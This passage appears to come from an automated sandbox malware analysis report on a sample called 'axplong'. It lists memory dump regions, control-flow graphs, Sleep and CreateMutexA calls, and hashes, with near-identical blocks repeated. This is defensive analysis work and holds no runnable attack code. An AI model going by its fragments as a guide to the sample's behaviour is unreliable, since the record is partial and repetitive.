                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 2cd9b5e0ba339a645f8c7d0d5bbab3c566c53520d1c23d32475f4cef54ab4839
                                                                                                                                                                                                        • Instruction ID: 01e8b5ab11cdbc9360508eed5b8fdef973dda395cf3bad3451d36652f163c930
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cd9b5e0ba339a645f8c7d0d5bbab3c566c53520d1c23d32475f4cef54ab4839
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD315731B001048BEF0CDBA8DC8876DB773AF86314F20861CE0509B7E5C77589819796

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 90 63a0de-63a0fe 94 63a100-63a10c 90->94 95 63a12c-63a148 90->95 96 63a122-63a129 call 64d593 94->96 97 63a10e-63a11c 94->97 98 63a176-63a195 95->98 99 63a14a-63a156 95->99 96->95 97->96 100 63a865-63a8c4 call 666b9a Sleep CreateMutexA 97->100 104 63a1c3-63a846 call 647f30 98->104 105 63a197-63a1a3 98->105 102 63a158-63a166 99->102 103 63a16c-63a173 call 64d593 99->103 120 63a8d7-63a8d8 100->120 121 63a8c6-63a8c8 100->121 102->100 102->103 103->98 106 63a1a5-63a1b3 105->106 107 63a1b9-63a1c0 call 64d593 105->107 106->100 106->107 107->104 121->120 122 63a8ca-63a8d5 121->122 122->120
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: f3fa0aa40ca0356c91e2496a40b585982cea4f560320109cca7f756cf3aa5209
                                                                                                                                                                                                        • Instruction ID: 7e126f97b4a96dd5c27cfd161e7c35320e47c3d7b9429443d9f5268600f9af12
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3fa0aa40ca0356c91e2496a40b585982cea4f560320109cca7f756cf3aa5209
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE311471B10100CBEF1CDBB8DC887ADB763AF86314F204669E050AB7E5D77989819796

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 124 63a348-63a368 128 63a396-63a3b2 124->128 129 63a36a-63a376 124->129 132 63a3e0-63a3ff 128->132 133 63a3b4-63a3c0 128->133 130 63a378-63a386 129->130 131 63a38c-63a393 call 64d593 129->131 130->131 134 63a86f-63a87e call 666b9a * 3 130->134 131->128 138 63a401-63a40d 132->138 139 63a42d-63a846 call 647f30 132->139 136 63a3c2-63a3d0 133->136 137 63a3d6-63a3dd call 64d593 133->137 157 63a883-63a8c4 Sleep CreateMutexA 134->157 158 63a87e call 666b9a 134->158 136->134 136->137 137->132 144 63a423-63a42a call 64d593 138->144 145 63a40f-63a41d 138->145 144->139 145->134 145->144 160 63a8d7-63a8d8 157->160 161 63a8c6-63a8c8 157->161 158->157 161->160 162 63a8ca-63a8d5 161->162 162->160
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 121de9f5a3eb6d79f476d3baa69c6f814856bd8a540e7d78e68d9b603ac20a11
                                                                                                                                                                                                        • Instruction ID: b580e401cbb4cac5cb5290978145a830dea91d792c134af5ccaffa94310d4a5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 121de9f5a3eb6d79f476d3baa69c6f814856bd8a540e7d78e68d9b603ac20a11
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC313771B10100CBFB1C9BB8DC887ADB7A3AF86314F208658E050DB7E5DB7999819792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 164 63a47d-63a49d 168 63a4cb-63a4e7 164->168 169 63a49f-63a4ab 164->169 172 63a515-63a534 168->172 173 63a4e9-63a4f5 168->173 170 63a4c1-63a4c8 call 64d593 169->170 171 63a4ad-63a4bb 169->171 170->168 171->170 176 63a874-63a87e call 666b9a * 2 171->176 174 63a562-63a846 call 647f30 172->174 175 63a536-63a542 172->175 178 63a4f7-63a505 173->178 179 63a50b-63a512 call 64d593 173->179 181 63a544-63a552 175->181 182 63a558-63a55f call 64d593 175->182 195 63a883-63a8c4 Sleep CreateMutexA 176->195 196 63a87e call 666b9a 176->196 178->176 178->179 179->172 181->176 181->182 182->174 198 63a8d7-63a8d8 195->198 199 63a8c6-63a8c8 195->199 196->195 199->198 200 63a8ca-63a8d5 199->200 200->198
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
